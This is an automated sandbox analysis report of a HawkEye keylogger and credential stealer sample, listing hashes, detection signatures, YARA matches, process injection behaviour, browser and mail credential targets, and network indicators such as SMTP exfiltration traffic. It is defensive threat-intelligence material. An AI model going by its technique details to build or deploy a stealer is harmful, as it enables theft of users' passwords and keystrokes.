Analysis Report Sample_B.exe

Overview

General Information

Sample Name: Sample_B.exe
Analysis ID: 354163
MD5: 78300bd48d50fa7e5f3f6a933cc5f739
SHA1: 03157f27b0d5141465adeeaf9b3a7b5f3e60f614
SHA256: 424212e76c0e660538ee49126079980b34f4dd343e002004f67ea71a937af5e3

Detection

HawkEye MailPassView
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected HawkEye Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected AntiVM_3
Yara detected HawkEye Keylogger
Yara detected MailPassView
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Allocates memory in foreign processes
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
May check the online IP address of the machine
Sample uses process hollowing technique
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query network adapater information
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w7x64
  • Sample_B.exe (PID: 2368 cmdline: 'C:\Users\user\Desktop\Sample_B.exe' MD5: 78300BD48D50FA7E5F3F6A933CC5F739)
    • Windows Update.exe (PID: 2360 cmdline: 'C:\Users\user\AppData\Roaming\Windows Update.exe' MD5: 78300BD48D50FA7E5F3F6A933CC5F739)
      • dw20.exe (PID: 2932 cmdline: dw20.exe -x -s 1708 MD5: FBA78261A16C65FA44145613E3669E6E)
      • vbc.exe (PID: 2852 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: 1672D0478049ABDAF0197BE64A7F867F)
      • vbc.exe (PID: 2816 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: 1672D0478049ABDAF0197BE64A7F867F)
  • cleanup

Malware Configuration

Threatname: HawkEye

{"Modules": ["mailpv", "WebBrowserPassView", "Mail PassView"], "Version": ""}

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
Source: Sample_B.exe | Rule: HKTL_NET_GUID_Stealer | Description: Detects c# red/black-team tools via typelibguid | Author: Arnim Rupp
  • 0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
Source: Sample_B.exe | Rule: RAT_HawkEye | Description: Detects HawkEye RAT | Author: Kevin Breen <kevin@techanarchy.net>
  • 0x7ba1d:$key: HawkEyeKeylogger
  • 0x7dd13:$salt: 099u787978786
  • 0x7c09a:$string1: HawkEye_Keylogger
  • 0x7ceed:$string1: HawkEye_Keylogger
  • 0x7dc73:$string1: HawkEye_Keylogger
  • 0x7c483:$string2: holdermail.txt
  • 0x7c4a3:$string2: holdermail.txt
  • 0x7c3c5:$string3: wallet.dat
  • 0x7c3dd:$string3: wallet.dat
  • 0x7c3f3:$string3: wallet.dat
  • 0x7d837:$string4: Keylog Records
  • 0x7db4f:$string4: Keylog Records
  • 0x7dd6b:$string5: do not script -->
  • 0x7ba05:$string6: \pidloc.txt
  • 0x7ba93:$string7: BSPLIT
  • 0x7baa3:$string7: BSPLIT
Source: Sample_B.exe | Rule: JoeSecurity_MailPassView | Description: Yara detected MailPassView | Author: Joe Security
Source: Sample_B.exe | Rule: JoeSecurity_HawkEye | Description: Yara detected HawkEye Keylogger | Author: Joe Security
Source: Sample_B.exe | Rule: JoeSecurity_WebBrowserPassView | Description: Yara detected WebBrowserPassView password recovery tool | Author: Joe Security

Dropped Files

Source | Rule | Description | Author | Strings
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe | Rule: HKTL_NET_GUID_Stealer | Description: Detects c# red/black-team tools via typelibguid | Author: Arnim Rupp
  • 0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe | Rule: RAT_HawkEye | Description: Detects HawkEye RAT | Author: Kevin Breen <kevin@techanarchy.net>
  • 0x7ba1d:$key: HawkEyeKeylogger
  • 0x7dd13:$salt: 099u787978786
  • 0x7c09a:$string1: HawkEye_Keylogger
  • 0x7ceed:$string1: HawkEye_Keylogger
  • 0x7dc73:$string1: HawkEye_Keylogger
  • 0x7c483:$string2: holdermail.txt
  • 0x7c4a3:$string2: holdermail.txt
  • 0x7c3c5:$string3: wallet.dat
  • 0x7c3dd:$string3: wallet.dat
  • 0x7c3f3:$string3: wallet.dat
  • 0x7d837:$string4: Keylog Records
  • 0x7db4f:$string4: Keylog Records
  • 0x7dd6b:$string5: do not script -->
  • 0x7ba05:$string6: \pidloc.txt
  • 0x7ba93:$string7: BSPLIT
  • 0x7baa3:$string7: BSPLIT
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe | Rule: JoeSecurity_MailPassView | Description: Yara detected MailPassView | Author: Joe Security
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe | Rule: JoeSecurity_HawkEye | Description: Yara detected HawkEye Keylogger | Author: Joe Security
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe | Rule: JoeSecurity_WebBrowserPassView | Description: Yara detected WebBrowserPassView password recovery tool | Author: Joe Security

Memory Dumps

Source | Rule | Description | Author | Strings
Source: 00000002.00000002.2112965167.0000000003610000.00000004.00000001.sdmp | Rule: JoeSecurity_WebBrowserPassView | Description: Yara detected WebBrowserPassView password recovery tool | Author: Joe Security
Source: 00000002.00000002.2112485117.0000000003371000.00000004.00000001.sdmp | Rule: JoeSecurity_MailPassView | Description: Yara detected MailPassView | Author: Joe Security
Source: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp | Rule: RAT_HawkEye | Description: Detects HawkEye RAT | Author: Kevin Breen <kevin@techanarchy.net>
  • 0x7b81d:$key: HawkEyeKeylogger
  • 0x7db13:$salt: 099u787978786
  • 0x7be9a:$string1: HawkEye_Keylogger
  • 0x7cced:$string1: HawkEye_Keylogger
  • 0x7da73:$string1: HawkEye_Keylogger
  • 0x7c283:$string2: holdermail.txt
  • 0x7c2a3:$string2: holdermail.txt
  • 0x7c1c5:$string3: wallet.dat
  • 0x7c1dd:$string3: wallet.dat
  • 0x7c1f3:$string3: wallet.dat
  • 0x7d637:$string4: Keylog Records
  • 0x7d94f:$string4: Keylog Records
  • 0x7db6b:$string5: do not script -->
  • 0x7b805:$string6: \pidloc.txt
  • 0x7b893:$string7: BSPLIT
  • 0x7b8a3:$string7: BSPLIT
Source: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp | Rule: JoeSecurity_MailPassView | Description: Yara detected MailPassView | Author: Joe Security
Source: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp | Rule: JoeSecurity_HawkEye | Description: Yara detected HawkEye Keylogger | Author: Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
Source: 0.0.Sample_B.exe.bc9c0d.1.unpack | Rule: JoeSecurity_WebBrowserPassView | Description: Yara detected WebBrowserPassView password recovery tool | Author: Joe Security
Source: 0.2.Sample_B.exe.2577280.5.raw.unpack | Rule: HKTL_NET_GUID_Stealer | Description: Detects c# red/black-team tools via typelibguid | Author: Arnim Rupp
  • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
Source: 2.2.Windows Update.exe.46e0000.9.raw.unpack | Rule: HKTL_NET_GUID_Stealer | Description: Detects c# red/black-team tools via typelibguid | Author: Arnim Rupp
  • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
Source: 2.2.Windows Update.exe.46f0000.10.raw.unpack | Rule: HKTL_NET_GUID_Stealer | Description: Detects c# red/black-team tools via typelibguid | Author: Arnim Rupp
  • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
Source: 0.2.Sample_B.exe.c1fa72.2.unpack | Rule: JoeSecurity_MailPassView | Description: Yara detected MailPassView | Author: Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: Sample_B.exe | Avira: detected
Source: Sample_B.exe | Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Avira: detection malicious, Label: TR/AD.MExecute.lzrac
Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Avira: detection malicious, Label: SPR/Tool.MailPassView.473
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe | Avira: detection malicious, Label: TR/AD.MExecute.lzrac
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe | Avira: detection malicious, Label: SPR/Tool.MailPassView.473
Found malware configuration
Source: Windows Update.exe.2360.2.memstr | Malware Configuration Extractor: HawkEye {"Modules": ["mailpv", "WebBrowserPassView", "Mail PassView"], "Version": ""}
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Sample_B.exe | Joe Sandbox ML: detected
Source: 0.0.Sample_B.exe.bc0000.0.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 0.0.Sample_B.exe.bc0000.0.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 2.2.Windows Update.exe.ee0000.1.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 2.2.Windows Update.exe.ee0000.1.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 0.2.Sample_B.exe.bc0000.0.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 0.2.Sample_B.exe.bc0000.0.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 2.0.Windows Update.exe.ee0000.0.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 2.0.Windows Update.exe.ee0000.0.unpack | Avira: Label: SPR/Tool.MailPassView.473

Compliance:

Uses 32bit PE files
Source: Sample_B.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Uses new MSVCR Dlls
Source: C:\Users\user\Desktop\Sample_B.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCR80.dll
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: Sample_B.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: Windows Update.exe, 00000002.00000002.2110851698.00000000005EC000.00000004.00000040.sdmp
Source: Binary string: pC:\Win.pdbassembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll source: Windows Update.exe, 00000002.00000002.2123111856.000000000970A000.00000004.00000010.sdmp
Source: Binary string: F^symbols\dll\mscorlib.pdb^ source: Windows Update.exe, 00000002.00000002.2123111856.000000000970A000.00000004.00000010.sdmp
Source: Binary string: .pdb; source: Windows Update.exe, 00000002.00000002.2123111856.000000000970A000.00000004.00000010.sdmp
Source: Binary string: mscorlib.pdb source: Windows Update.exe, 00000002.00000002.2123111856.000000000970A000.00000004.00000010.sdmp
Source: Binary string: ^indows\mscorlib.pdbpdblib.pdb source: Windows Update.exe, 00000002.00000002.2110851698.00000000005EC000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdbs\AppData\Roaming\Windows Update.exe source: Windows Update.exe, 00000002.00000002.2110851698.00000000005EC000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdb8 source: Windows Update.exe, 00000002.00000002.2110851698.00000000005EC000.00000004.00000040.sdmp
Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: Sample_B.exe
Source: Binary string: dows\mC:\Users\user\AppData\Roaming__b77a5c561934e089\mscorlib.pdbne_d08cc06a442b34fc source: Windows Update.exe, 00000002.00000002.2110645505.00000000003A0000.00000004.00000020.sdmp
Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: Sample_B.exe
Source: Binary string: C:\Windows\dll\mscorlib.pdb source: Windows Update.exe, 00000002.00000002.2110851698.00000000005EC000.00000004.00000040.sdmp
Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: Sample_B.exe
Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdbFP source: Windows Update.exe, 00000002.00000002.2123111856.000000000970A000.00000004.00000010.sdmp
Source: Binary string: ^T3/pC:\Windows\mscorlib.pdb4 source: Windows Update.exe, 00000002.00000002.2123111856.000000000970A000.00000004.00000010.sdmp
Source: Binary string: mscorlib.pdbH source: Windows Update.exe, 00000002.00000002.2123111856.000000000970A000.00000004.00000010.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: Windows Update.exe, 00000002.00000002.2110851698.00000000005EC000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: Sample_B.exe, 00000000.00000002.2076293431.0000000002050000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2111699782.0000000000E70000.00000002.00000001.sdmp
Source: Sample_B.exe | Binary or memory string: autorun.inf
Source: Sample_B.exe | Binary or memory string: [autorun]
Source: Windows Update.exe | Binary or memory string: [autorun]
Source: Windows Update.exe | Binary or memory string: autorun.inf
Source: Sample_B.exe | Binary or memory string: autorun.inf
Source: Sample_B.exe | Binary or memory string: [autorun]
Source: C:\Users\user\Desktop\Sample_B.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] | 0_2_005514C0
Source: C:\Users\user\Desktop\Sample_B.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] | 0_2_00550728
Source: C:\Users\user\Desktop\Sample_B.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] | 0_2_005517F8
Source: C:\Users\user\Desktop\Sample_B.exe | Code function: 4x nop then jmp 00551A73h | 0_2_005519B0
Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 4x nop then lea esp, dword ptr [ebp-08h] | 2_2_004E7810
Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] | 2_2_004E6059
Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] | 2_2_004EC627
Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] | 2_2_004E9C3F
Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 4x nop then call 004E1B20h | 2_2_004E9634
Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] | 2_2_004E9634
Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 4x nop then mov esp, ebp | 2_2_004E48C7
Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] | 2_2_004E14C0
Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] | 2_2_004E5CEE
Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] | 2_2_004E98F9
Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] | 2_2_004EA2F0
Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] | 2_2_004EC48F
Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 4x nop then call 004E1B20h | 2_2_004E954A
Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] | 2_2_004E954A
Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] | 2_2_004E0728
Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] | 2_2_004E6731
Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] | 2_2_004EA3DA
Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 4x nop then call 004E1B20h | 2_2_004E8DE8
Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] | 2_2_004E8DE8
Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] | 2_2_004E17F8
Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 4x nop then jmp 004E1A73h | 2_2_004E19A0
Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 4x nop then jmp 004E1A73h | 2_2_004E19B0

Networking:

May check the online IP address of the machine
Source: unknown | DNS query: name: whatismyipaddress.com
Source: unknown | DNS query: name: whatismyipaddress.com
Source: unknown | DNS query: name: whatismyipaddress.com
Source: unknown | DNS query: name: whatismyipaddress.com
Source: unknown | DNS query: name: whatismyipaddress.com
Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 66.102.1.108:587
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: whatismyipaddress.com Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 104.16.155.36
Source: Joe Sandbox View | IP Address: 66.102.1.108
Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 66.102.1.108:587
Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 2_2_0011A09A recv | 2_2_0011A09A
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: whatismyipaddress.com Connection: Keep-Alive
Source: Sample_B.exe | String found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: Sample_B.exe | String found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122590766.0000000008DA0000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: Sample_B.exe, 00000000.00000002.2075873795.00000000004C2000.00000004.00000020.sdmp | String found in binary or memory: WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: Sample_B.exe, 00000000.00000002.2075873795.00000000004C2000.00000004.00000020.sdmp | String found in binary or memory: WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: Sample_B.exe, Windows Update.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown | DNS traffic detected: queries for: 163.190.5.0.in-addr.arpa
Source: 3C428B1A3E5F57D887EC4B864FAC5DCC.3.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt
Source: Sample_B.exe | String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: Windows Update.exe, 00000002.00000002.2115241633.00000000054B2000.00000004.00000001.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: Windows Update.exe, 00000002.00000002.2110645505.00000000003A0000.00000004.00000020.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Windows Update.exe, 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: 77EC63BDA74BD0D0E0426DC8F8008506.3.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122590766.0000000008DA0000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122590766.0000000008DA0000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122804139.0000000008F87000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122804139.0000000008F87000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: Sample_B.exe | String found in binary or memory: http://ocsp.comodoca.com0
Source: Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: Windows Update.exe, 00000002.00000002.2115241633.00000000054B2000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: Windows Update.exe, 00000002.00000002.2115241633.00000000054B2000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: Windows Update.exe, 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: Windows Update.exe, 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmp | String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2113827446.0000000004A30000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122804139.0000000008F87000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: Sample_B.exe, Windows Update.exe | String found in binary or memory: http://whatismyipaddress.com/
Source: Sample_B.exe | String found in binary or memory: http://whatismyipaddress.com/-
Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122804139.0000000008F87000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2113827446.0000000004A30000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: Windows Update.exe, 00000002.00000002.2115241633.00000000054B2000.00000004.00000001.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122590766.0000000008DA0000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122804139.0000000008F87000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122590766.0000000008DA0000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: Sample_B.exe | String found in binary or memory: http://www.nirsoft.net/
Source: Windows Update.exe, 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmp | String found in binary or memory: http://www.site.com/logs.php
Source: Windows Update.exe, 00000002.00000002.2122590766.0000000008DA0000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: Sample_B.exe, Windows Update.exe | String found in binary or memory: https://login.yahoo.com/config/login
Source: Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmp | String found in binary or memory: https://pki.goog/repository/0
Source: Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
Source: Sample_B.exe, Windows Update.exe | String found in binary or memory: https://www.google.com/accounts/servicelogin

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected HawkEye Keylogger
Source: Yara match File source: Sample_B.exe, type: SAMPLE
Source: Yara match File source: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, type: MEMORY
